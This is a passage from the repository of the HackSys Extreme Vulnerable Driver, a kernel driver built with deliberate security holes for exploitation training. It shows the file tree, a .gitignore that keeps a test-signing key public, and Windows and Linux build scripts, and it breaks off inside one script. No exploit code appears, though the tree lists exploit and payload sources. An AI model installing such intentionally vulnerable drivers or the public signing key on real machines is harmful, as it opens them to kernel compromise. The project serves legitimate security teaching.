├── .gitignore
├── Builder
├── Build_HEVD_All.bat
├── Build_HEVD_All.sh
├── Build_HEVD_Exploit.bat
├── Build_HEVD_Secure_arm64.bat
├── Build_HEVD_Secure_x64.bat
├── Build_HEVD_Secure_x64.sh
├── Build_HEVD_Secure_x86.bat
├── Build_HEVD_Vulnerable_arm64.bat
├── Build_HEVD_Vulnerable_x64.bat
├── Build_HEVD_Vulnerable_x64.sh
└── Build_HEVD_Vulnerable_x86.bat
├── CONTRIBUTING.md
├── Driver
├── CMake
│ ├── DetectOS.cmake
│ ├── LKM.cmake
│ └── WDK.cmake
├── CMakeLists.txt
└── HEVD
│ ├── CMakeLists.txt
│ ├── Linux
│ ├── ArbitraryWrite.c
│ ├── ArbitraryWrite.h
│ ├── BufferOverflowStack.c
│ ├── BufferOverflowStack.h
│ ├── CMakeLists.txt
│ ├── Common.h
│ ├── HackSysExtremeVulnerableDriver.c
│ ├── HackSysExtremeVulnerableDriver.h
│ ├── IntegerOverflow.c
│ ├── IntegerOverflow.h
│ ├── UninitializedMemoryStack.c
│ └── UninitializedMemoryStack.h
│ └── Windows
│ ├── ArbitraryIncrement.c
│ ├── ArbitraryIncrement.h
│ ├── ArbitraryReadWriteHelperNonPagedPoolNx.c
│ ├── ArbitraryReadWriteHelperNonPagedPoolNx.h
│ ├── ArbitraryWrite.c
│ ├── ArbitraryWrite.h
│ ├── BufferOverflowNonPagedPool.c
│ ├── BufferOverflowNonPagedPool.h
│ ├── BufferOverflowNonPagedPoolNx.c
│ ├── BufferOverflowNonPagedPoolNx.h
│ ├── BufferOverflowPagedPoolSession.c
│ ├── BufferOverflowPagedPoolSession.h
│ ├── BufferOverflowStack.c
│ ├── BufferOverflowStack.h
│ ├── BufferOverflowStackGS.c
│ ├── BufferOverflowStackGS.h
│ ├── CMakeLists.txt
│ ├── Common.h
│ ├── DoubleFetch.c
│ ├── DoubleFetch.h
│ ├── HEVD.inf
│ ├── HEVD.pfx
│ ├── HEVD.sln
│ ├── HackSysExtremeVulnerableDriver.c
│ ├── HackSysExtremeVulnerableDriver.h
│ ├── HackSysExtremeVulnerableDriver.vcxproj
│ ├── HackSysExtremeVulnerableDriver.vcxproj.filters
│ ├── InsecureKernelResourceAccess.c
│ ├── InsecureKernelResourceAccess.h
│ ├── IntegerOverflow.c
│ ├── IntegerOverflow.h
│ ├── MemoryDisclosureNonPagedPool.c
│ ├── MemoryDisclosureNonPagedPool.h
│ ├── MemoryDisclosureNonPagedPoolNx.c
│ ├── MemoryDisclosureNonPagedPoolNx.h
│ ├── NullPointerDereference.c
│ ├── NullPointerDereference.h
│ ├── TypeConfusion.c
│ ├── TypeConfusion.h
│ ├── UninitializedMemoryPagedPool.c
│ ├── UninitializedMemoryPagedPool.h
│ ├── UninitializedMemoryStack.c
│ ├── UninitializedMemoryStack.h
│ ├── UseAfterFreeNonPagedPool.c
│ ├── UseAfterFreeNonPagedPool.h
│ ├── UseAfterFreeNonPagedPoolNx.c
│ ├── UseAfterFreeNonPagedPoolNx.h
│ ├── WriteNULL.c
│ └── WriteNULL.h
├── Exploit
├── ArbitraryOverwrite.c
├── ArbitraryOverwrite.h
├── Common.c
├── Common.h
├── DoubleFetch.c
├── DoubleFetch.h
├── HackSysEVDExploit.c
├── HackSysEVDExploit.h
├── HackSysEVDExploit.sln
├── HackSysEVDExploit.vcxproj
├── HackSysEVDExploit.vcxproj.filters
├── InsecureKernelResourceAccess.c
├── InsecureKernelResourceAccess.h
├── IntegerOverflow.c
├── IntegerOverflow.h
├── NullPointerDereference.c
├── NullPointerDereference.h
├── Payloads.c
├── Payloads.h
├── PoolOverflow.c
├── PoolOverflow.h
├── StackOverflow.c
├── StackOverflow.h
├── StackOverflowGS.c
├── StackOverflowGS.h
├── TypeConfusion.c
├── TypeConfusion.h
├── UninitializedHeapVariable.c
├── UninitializedHeapVariable.h
├── UninitializedStackVariable.c
├── UninitializedStackVariable.h
├── UseAfterFree.c
├── UseAfterFree.h
└── arg.h
├── LICENSE
├── README.md
├── Screenshots
├── hevd-banner.png
├── hevd-debug-print.png
├── hevd-exploitation.png
├── hevd-help.png
├── hevd-linux-banner.png
├── hevd-linux-install-uninstall.png
├── hevd-linux-ioctl-log.png
└── hevd-linux-ioctl-tests.png
├── Tools
├── hevd_linux_installer.sh
└── hevd_linux_tests.py
├── Whitepaper
├── HackSys Extreme Vulnerable Driver.pptx
└── HackSys_Extreme_Vulnerable_Driver_Whitepaper.pdf
└── appveyor.yml
/.gitignore:
--------------------------------------------------------------------------------
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.

# User-specific files
*.suo
*.user
*.userosscache
*.sln.docstates

# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs

# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
# build/ also covers the output tree the Builder scripts write under <repo>/build/driver/...
build/
bld/
[Bb]in/
[Oo]bj/
[Cc]ompile/

# Visual Studio 2015 cache/options directory
.vs/

# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*

# NUNIT
*.VisualState.xml
TestResult.xml

# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c

# DNX
project.lock.json
artifacts/

*_i.c
*_p.c
*_i.h
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc

# Chutzpah Test files
_Chutzpah*

# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile

# Visual Studio profiler
*.psess
*.vsp
*.vspx

# TFS 2012 Local Workspace
$tf/

# Guidance Automation Toolkit
*.gpState

# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user

# JustCode is a .NET coding add-in
.JustCode

# TeamCity is a build add-in
_TeamCity*

# DotCover is a Code Coverage Tool
*.dotCover

# NCrunch
_NCrunch_*
.*crunch*.local.xml

# MightyMoose
*.mm.*
AutoTest.Net/

# Web workbench (sass)
.sass-cache/

# Installshield output folder
[Ee]xpress/

# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html

# Click-Once directory
publish/

# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# TODO: Comment the next line if you want to checkin your web deploy settings
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj

# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/packages/*
# except build/, which is used as an MSBuild target.
!**/packages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/packages/repositories.config

# Windows Azure Build Output
csx/
*.build.csdef

# Windows Store app package directory
AppPackages/

# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!*.[Cc]ache/

# Others
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.dbproj.schemaview
# PKCS#12 bundles carry a private key; ignored by default, see the single exception below
*.pfx
*.publishsettings
node_modules/
orleans.codegen.cs

# RIA/Silverlight projects
Generated_Code/

# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm

# SQL Server files
*.mdf
*.ldf

# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings

# Microsoft Fakes
FakesAssemblies/

# Node.js Tools for Visual Studio
.ntvs_analysis.dat

# Visual Studio 6 build log
*.plg

# Visual Studio 6 workspace options file
*.opt

# White-list PFX file
# NOTE(review): HEVD.pfx is deliberately tracked, so its private key is public.
# Presumably it is the test-signing certificate the Windows driver build uses
# (the build moves a .cat alongside the .sys); never reuse it to sign anything
# else, and only install it into the trust store of an isolated lab machine.
!Driver/HEVD/Windows/HEVD.pfx

# Ignore temporary build file
Driver/HEVD/Linux/Kbuild

--------------------------------------------------------------------------------
/Builder/Build_HEVD_All.bat:
--------------------------------------------------------------------------------
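@echo off

rem Builds every Windows driver variant (secure and vulnerable, x64/x86/arm64).
rem The per-variant scripts locate the driver sources relative to the current
rem directory, so always run them from this script's own directory no matter
rem where the caller started. Stops at the first variant that fails.
pushd "%~dp0" || exit /b 1

rem Each variant runs in a child cmd.exe so the environment changes made by
rem one variant's VsDevCmd.bat call do not carry over into the next build
"%COMSPEC%" /c Build_HEVD_Secure_x64.bat || goto :failed
"%COMSPEC%" /c Build_HEVD_Secure_x86.bat || goto :failed
"%COMSPEC%" /c Build_HEVD_Secure_arm64.bat || goto :failed
"%COMSPEC%" /c Build_HEVD_Vulnerable_x64.bat || goto :failed
"%COMSPEC%" /c Build_HEVD_Vulnerable_x86.bat || goto :failed
"%COMSPEC%" /c Build_HEVD_Vulnerable_arm64.bat || goto :failed

popd
exit /b 0

:failed
echo [-] One of the driver builds failed, stopping
popd
exit /b 1
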
--------------------------------------------------------------------------------
/Builder/Build_HEVD_All.sh:
--------------------------------------------------------------------------------
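#!/usr/bin/env bash
#
# Builds both Linux driver flavours: secure first, then vulnerable.
# The per-flavour scripts resolve the driver sources relative to the current
# directory, so run from this script's own directory regardless of the
# caller's working directory. Stops at the first flavour that fails.

set -eu

cd "$(dirname "$0")"

# Run with bash to honour the scripts' own shebang instead of whatever sh is.
bash ./Build_HEVD_Secure_x64.sh
bash ./Build_HEVD_Vulnerable_x64.sh
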
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Exploit.bat:
--------------------------------------------------------------------------------
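@echo off
echo.
echo # # ##### #######
echo # # ## #### # # # # # # #### # ###### ## # #
echo # # # # # # # # # # # # # # # # ## ##
echo ####### # # # #### ##### # #### # ##### # # # ## #
echo # # ###### # # # # # # # # ###### # #
echo # # # # # # # # # # # # # # # # # # #
echo # # # # #### # # ##### # #### # ###### # # # #
echo.
echo HackSys Extreme Vulnerable Driver Exploit Build Utility

REM Builds the exploit solution with the VS2010 x86 toolchain, stages the
REM output under ..\compile\exploit and pushes its symbols to a local symbol
REM store. Run from the Builder directory. Exits with 1 on the first failure.

REM store the current directory path so the script can return to it on exit
set currentDir=%cd%

REM store the local symbol server path; a value already set in the environment wins
if "%localSymbolServerPath%"=="" set localSymbolServerPath=C:\Xtra\Symbols\Custom

REM vcvarsall.bat of VS2010, found through its VS100COMNTOOLS environment variable
set VC_PATH="%VS100COMNTOOLS%\..\..\VC\vcvarsall.bat"

echo.
echo [+] vcvarsall path: %VC_PATH%
if not exist %VC_PATH% (
    echo [-] vcvarsall.bat not found, check that Visual Studio 2010 is installed
    goto :failed
)

echo.
echo **************************************************
@call %VC_PATH% x86
echo **************************************************

REM /d also switches drive; abort rather than run msbuild in the wrong directory
cd /d "%currentDir%\..\Exploit" || goto :failed

echo.
echo **************************************************
echo Building HackSys Extreme Vulnerable Driver Exploit
echo **************************************************
echo.
if exist "%currentDir%\..\compile\exploit" rmdir /S /Q "%currentDir%\..\compile\exploit"
REM NOTE(review): OutDir is left unquoted as before; a repository path containing
REM spaces would need an escaping form that MSBuild accepts, which is not verified here
msbuild /t:Clean;Build /p:OutDir=%currentDir%\..\compile\exploit\;Configuration=Release;Platform=Win32 || goto :failed
echo **************************************************
echo.
echo **************************************************
echo Cleaning The Build Directory
echo **************************************************
echo.
echo Deleting Release folder
if exist "%currentDir%\..\Exploit\Release" rmdir /S /Q "%currentDir%\..\Exploit\Release"
echo ******************************************

echo.
echo ******************************************
echo Transferring Driver Symbols to Symbol Store
echo ******************************************
REM Fail here instead of letting symstore.exe be resolved from whatever directory cd left us in
cd /d "C:\Program Files\Debugging Tools for Windows (x86)" || goto :failed
echo.
REM No trailing backslash before the closing quote: Windows argument parsing
REM commonly treats a backslash-quote pair as an escaped quote and mangles the path
symstore.exe add /r /f "%currentDir%\..\compile\exploit" /s "%localSymbolServerPath%" /t "ExploitSymbol" /v "1.0" || goto :failed
echo ******************************************
echo.
echo ******************************************
echo HackSys Extreme Vulnerable Driver Built
echo Successfully
echo ******************************************
echo.
cd /d "%currentDir%"
pause
exit /b 0

:failed
echo.
echo ******************************************
echo HackSys Extreme Vulnerable Driver Exploit Build Failed
echo ******************************************
echo.
cd /d "%currentDir%"
pause
exit /b 1
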
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Secure_arm64.bat:
--------------------------------------------------------------------------------
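@echo off
echo.
echo # # ##### #######
echo # # ## #### # # # # # # #### # ###### ## # #
echo # # # # # # # # # # # # # # # # ## ##
echo ####### # # # #### ##### # #### # ##### # # # ## #
echo # # ###### # # # # # # # # ###### # #
echo # # # # # # # # # # # # # # # # # # #
echo # # # # #### # # ##### # #### # ###### # # # #
echo.
echo HackSys Extreme Vulnerable Driver Build Utility
echo.

rem Builds the secure (patched) Windows flavour of the driver for arm64.
rem Run from the Builder directory: the driver sources are located relative
rem to the current directory. Exits with 1 on the first failing step.

rem Target architecture, passed to VsDevCmd.bat and used in the build path
set BUILD_ARCH=arm64

rem Store the current directory path so the script can return to it on exit
set CURRENT_DIR=%cd%
set PROJECT_NAME=HEVD
set PROJECT_DIR=%CURRENT_DIR%\..\Driver\

rem Get the normalized path
for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"

set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\secure\%BUILD_ARCH%

rem VS2017U2 contains vswhere.exe; a VSWHERE already set in the environment wins
if "%VSWHERE%"=="" (
    set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
)

echo [+] vswhere path: %VSWHERE%
if not exist "%VSWHERE%" (
    echo [-] vswhere.exe not found, set VSWHERE to its location
    goto :failed
)

rem Ask vswhere for the newest Visual Studio that ships MSBuild; the quoted
rem set keeps the returned path intact even when it contains spaces
set "VS_INSTALL_DIR="
for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
    set "VS_INSTALL_DIR=%%i"
)

if "%VS_INSTALL_DIR%"=="" (
    echo [-] No Visual Studio installation with MSBuild was found
    goto :failed
)

echo [+] Visual Studio Path: %VS_INSTALL_DIR%

set "VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat"

echo [+] Executing: %VSDEVCMD_PATH%

echo.
rem arm64 is cross-compiled, so the host toolchain is pinned to amd64
@call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH% -host_arch=amd64
if errorlevel 1 (
    echo [-] VsDevCmd.bat failed
    goto :failed
)
echo.

echo [+] Build target architecture: %BUILD_ARCH%
echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
echo [+] Build directory: %BUILD_DIR%
echo [+] Removing build directory

rem Quoted so a repository path containing spaces breaks neither the test nor the delete
if exist "%BUILD_DIR%" (
    rmdir /S /Q "%BUILD_DIR%"
)

echo [+] Creating build directory

mkdir "%BUILD_DIR%"
rem /d also switches drive; abort rather than configure in the wrong directory
cd /d "%BUILD_DIR%" || goto :failed

echo [+] Generating build configuration files

cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" -DSECURE=1 "%PROJECT_DIR%" || goto :failed

echo.
echo [+] Building secure HackSys Extreme Vulnerable Driver
echo.

CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v" || goto :failed
echo.

echo [+] Copying built files

rem A missing .sys means no driver was produced, so that move is fatal;
rem the remaining artifacts are moved best-effort as before
echo [*] %PROJECT_NAME%.sys
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%" || goto :failed

echo [*] %PROJECT_NAME%.pdb
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.cat
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.inf
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
echo.

echo [+] Cleaning build directory
rem Keep only the four shipped artifacts. The quoted, case-insensitive compare
rem also copes with files that have no extension, where the unquoted form
rem leaves an empty left operand and cmd aborts the whole script
for /r "%BUILD_DIR%" %%a in (*) do (
    if /i not "%%~xa"==".sys" (
        if /i not "%%~xa"==".pdb" (
            if /i not "%%~xa"==".inf" (
                if /i not "%%~xa"==".cat" (
                    del /f /q "%%a"
                )
            )
        )
    )
)

rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
echo.

echo [+] Built secure HackSys Extreme Vulnerable Driver successfully
cd /d "%CURRENT_DIR%"
echo.
exit /b 0

:failed
echo.
echo [-] Building the secure HackSys Extreme Vulnerable Driver failed
cd /d "%CURRENT_DIR%"
echo.
exit /b 1
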
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Secure_x64.bat:
--------------------------------------------------------------------------------
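@echo off
echo.
echo # # ##### #######
echo # # ## #### # # # # # # #### # ###### ## # #
echo # # # # # # # # # # # # # # # # ## ##
echo ####### # # # #### ##### # #### # ##### # # # ## #
echo # # ###### # # # # # # # # ###### # #
echo # # # # # # # # # # # # # # # # # # #
echo # # # # #### # # ##### # #### # ###### # # # #
echo.
echo HackSys Extreme Vulnerable Driver Build Utility
echo.

rem Builds the secure (patched) Windows flavour of the driver for x64.
rem Run from the Builder directory: the driver sources are located relative
rem to the current directory. Exits with 1 on the first failing step.

rem Target architecture, passed to VsDevCmd.bat and used in the build path
set BUILD_ARCH=x64

rem Store the current directory path so the script can return to it on exit
set CURRENT_DIR=%cd%
set PROJECT_NAME=HEVD
set PROJECT_DIR=%CURRENT_DIR%\..\Driver\

rem Get the normalized path
for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"

set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\secure\%BUILD_ARCH%

rem VS2017U2 contains vswhere.exe; a VSWHERE already set in the environment wins
if "%VSWHERE%"=="" (
    set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
)

echo [+] vswhere path: %VSWHERE%
if not exist "%VSWHERE%" (
    echo [-] vswhere.exe not found, set VSWHERE to its location
    goto :failed
)

rem Ask vswhere for the newest Visual Studio that ships MSBuild; the quoted
rem set keeps the returned path intact even when it contains spaces
set "VS_INSTALL_DIR="
for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
    set "VS_INSTALL_DIR=%%i"
)

if "%VS_INSTALL_DIR%"=="" (
    echo [-] No Visual Studio installation with MSBuild was found
    goto :failed
)

echo [+] Visual Studio Path: %VS_INSTALL_DIR%

set "VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat"

echo [+] Executing: %VSDEVCMD_PATH%

echo.
@call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH%
if errorlevel 1 (
    echo [-] VsDevCmd.bat failed
    goto :failed
)
echo.

echo [+] Build target architecture: %BUILD_ARCH%
echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
echo [+] Build directory: %BUILD_DIR%
echo [+] Removing build directory

rem Quoted so a repository path containing spaces breaks neither the test nor the delete
if exist "%BUILD_DIR%" (
    rmdir /S /Q "%BUILD_DIR%"
)

echo [+] Creating build directory

mkdir "%BUILD_DIR%"
rem /d also switches drive; abort rather than configure in the wrong directory
cd /d "%BUILD_DIR%" || goto :failed

echo [+] Generating build configuration files

cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" -DSECURE=1 "%PROJECT_DIR%" || goto :failed

echo.
echo [+] Building secure HackSys Extreme Vulnerable Driver
echo.

CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v" || goto :failed
echo.

echo [+] Copying built files

rem A missing .sys means no driver was produced, so that move is fatal;
rem the remaining artifacts are moved best-effort as before
echo [*] %PROJECT_NAME%.sys
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%" || goto :failed

echo [*] %PROJECT_NAME%.pdb
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.cat
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.inf
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
echo.

echo [+] Cleaning build directory
rem Keep only the four shipped artifacts. The quoted, case-insensitive compare
rem also copes with files that have no extension, where the unquoted form
rem leaves an empty left operand and cmd aborts the whole script
for /r "%BUILD_DIR%" %%a in (*) do (
    if /i not "%%~xa"==".sys" (
        if /i not "%%~xa"==".pdb" (
            if /i not "%%~xa"==".inf" (
                if /i not "%%~xa"==".cat" (
                    del /f /q "%%a"
                )
            )
        )
    )
)

rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
echo.

echo [+] Built secure HackSys Extreme Vulnerable Driver successfully
cd /d "%CURRENT_DIR%"
echo.
exit /b 0

:failed
echo.
echo [-] Building the secure HackSys Extreme Vulnerable Driver failed
cd /d "%CURRENT_DIR%"
echo.
exit /b 1
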
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Secure_x64.sh:
--------------------------------------------------------------------------------
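#!/usr/bin/env bash
#
# Builds the secure (patched) Linux flavour of the HackSys Extreme Vulnerable
# Driver for x64 and moves the resulting hevd.ko into the binary directory.
#
# Run from the Builder directory: the driver sources are located relative to
# $PWD. Exits non-zero on the first failing step.

set -euo pipefail

BANNER="
# # ##### #######
# # ## #### # # # # # # #### # ###### ## # #
# # # # # # # # # # # # # # # # ## ##
####### # # # #### ##### # #### # ##### # # # ## #
# # ###### # # # # # # # # ###### # #
# # # # # # # # # # # # # # # # # # #
# # # # #### # # ##### # #### # ###### # # # #

HackSys Extreme Vulnerable Driver Build Utility
"

echo "${BANNER}"

# Standard constants
BUILD_ARCH=x64
CURRENT_DIR=$PWD
PROJECT_NAME=hevd
PROJECT_DIR="$(realpath -m "${CURRENT_DIR}/../Driver")"
BUILD_DIR="$(realpath -m "${PROJECT_DIR}/../_build")"
BINARY_DIR="$(realpath -m "${PROJECT_DIR}/../build/driver/linux/secure/${BUILD_ARCH}")"

echo "[+] Build target architecture: ${BUILD_ARCH}"
echo "[+] Host Architecture: $(uname -m)"
echo "[+] Build directory: ${BUILD_DIR}"
echo "[+] Binary directory: ${BINARY_DIR}"
echo "[+] Removing build & binary directory"

# Paths are always quoted: an unquoted rm -rf on a path containing spaces
# word-splits and removes something other than the build tree.
if [ -d "${BUILD_DIR}" ]; then
    rm -rf "${BUILD_DIR}"
fi

if [ -d "${BINARY_DIR}" ]; then
    rm -rf "${BINARY_DIR}"
fi

echo "[+] Creating build directory"

mkdir -p "${BUILD_DIR}"
# Abort if the cd fails rather than configuring and cleaning in the wrong directory
cd "${BUILD_DIR}" || exit 1

echo "[+] Generating build configuration files"

cmake -G "Unix Makefiles" -DSECURE=1 "${PROJECT_DIR}"

echo
echo "[+] Building secure HackSys Extreme Vulnerable Driver"
echo

make
echo

echo "[+] Creating binary directory"
mkdir -p "${BINARY_DIR}"

echo "[+] Copying built files"

echo "[*] ${PROJECT_NAME}.ko"
mv -f "${BUILD_DIR}/${PROJECT_NAME}.ko" "${BINARY_DIR}"
echo

echo "[+] Cleaning build directory"

make clean
# Leave the build tree before deleting it so the shell's cwd stays valid
cd "${CURRENT_DIR}"
rm -rf "${BUILD_DIR}"

echo "[+] Built secure HackSys Extreme Vulnerable Driver successfully"
echo
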
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Secure_x86.bat:
--------------------------------------------------------------------------------
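@echo off
echo.
echo # # ##### #######
echo # # ## #### # # # # # # #### # ###### ## # #
echo # # # # # # # # # # # # # # # # ## ##
echo ####### # # # #### ##### # #### # ##### # # # ## #
echo # # ###### # # # # # # # # ###### # #
echo # # # # # # # # # # # # # # # # # # #
echo # # # # #### # # ##### # #### # ###### # # # #
echo.
echo HackSys Extreme Vulnerable Driver Build Utility
echo.

rem Builds the secure (patched) Windows flavour of the driver for x86.
rem Run from the Builder directory: the driver sources are located relative
rem to the current directory. Exits with 1 on the first failing step.

rem Target architecture, passed to VsDevCmd.bat and used in the build path
set BUILD_ARCH=x86

rem Store the current directory path so the script can return to it on exit
set CURRENT_DIR=%cd%
set PROJECT_NAME=HEVD
set PROJECT_DIR=%CURRENT_DIR%\..\Driver\

rem Get the normalized path
for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"

set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\secure\%BUILD_ARCH%

rem VS2017U2 contains vswhere.exe; a VSWHERE already set in the environment wins
if "%VSWHERE%"=="" (
    set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
)

echo [+] vswhere path: %VSWHERE%
if not exist "%VSWHERE%" (
    echo [-] vswhere.exe not found, set VSWHERE to its location
    goto :failed
)

rem Ask vswhere for the newest Visual Studio that ships MSBuild; the quoted
rem set keeps the returned path intact even when it contains spaces
set "VS_INSTALL_DIR="
for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
    set "VS_INSTALL_DIR=%%i"
)

if "%VS_INSTALL_DIR%"=="" (
    echo [-] No Visual Studio installation with MSBuild was found
    goto :failed
)

echo [+] Visual Studio Path: %VS_INSTALL_DIR%

set "VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat"

echo [+] Executing: %VSDEVCMD_PATH%

echo.
@call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH%
if errorlevel 1 (
    echo [-] VsDevCmd.bat failed
    goto :failed
)
echo.

echo [+] Build target architecture: %BUILD_ARCH%
echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
echo [+] Build directory: %BUILD_DIR%
echo [+] Removing build directory

rem Quoted so a repository path containing spaces breaks neither the test nor the delete
if exist "%BUILD_DIR%" (
    rmdir /S /Q "%BUILD_DIR%"
)

echo [+] Creating build directory

mkdir "%BUILD_DIR%"
rem /d also switches drive; abort rather than configure in the wrong directory
cd /d "%BUILD_DIR%" || goto :failed

echo [+] Generating build configuration files

cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" -DSECURE=1 "%PROJECT_DIR%" || goto :failed

echo.
echo [+] Building secure HackSys Extreme Vulnerable Driver
echo.

CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v" || goto :failed
echo.

echo [+] Copying built files

rem A missing .sys means no driver was produced, so that move is fatal;
rem the remaining artifacts are moved best-effort as before
echo [*] %PROJECT_NAME%.sys
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%" || goto :failed

echo [*] %PROJECT_NAME%.pdb
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.cat
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"

echo [*] %PROJECT_NAME%.inf
move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
echo.

echo [+] Cleaning build directory
rem Keep only the four shipped artifacts. The quoted, case-insensitive compare
rem also copes with files that have no extension, where the unquoted form
rem leaves an empty left operand and cmd aborts the whole script
for /r "%BUILD_DIR%" %%a in (*) do (
    if /i not "%%~xa"==".sys" (
        if /i not "%%~xa"==".pdb" (
            if /i not "%%~xa"==".inf" (
                if /i not "%%~xa"==".cat" (
                    del /f /q "%%a"
                )
            )
        )
    )
)

rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
echo.

echo [+] Built secure HackSys Extreme Vulnerable Driver successfully
cd /d "%CURRENT_DIR%"
echo.
exit /b 0

:failed
echo.
echo [-] Building the secure HackSys Extreme Vulnerable Driver failed
cd /d "%CURRENT_DIR%"
echo.
exit /b 1
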
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Vulnerable_arm64.bat:
--------------------------------------------------------------------------------
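@echo off
echo.
echo # # ##### #######
echo # # ## #### # # # # # # #### # ###### ## # #
echo # # # # # # # # # # # # # # # # ## ##
echo ####### # # # #### ##### # #### # ##### # # # ## #
echo # # ###### # # # # # # # # ###### # #
echo # # # # # # # # # # # # # # # # # # #
echo # # # # #### # # ##### # #### # ###### # # # #
echo.
echo HackSys Extreme Vulnerable Driver Build Utility
echo.

rem Builds the vulnerable (unpatched) Windows flavour of the driver for arm64.
rem Run from the Builder directory: the driver sources are located relative
rem to the current directory. Exits with 1 on the first failing step.

rem Target architecture, passed to VsDevCmd.bat and used in the build path
set BUILD_ARCH=arm64

rem Store the current directory path so the script can return to it on exit
set CURRENT_DIR=%cd%
set PROJECT_NAME=HEVD
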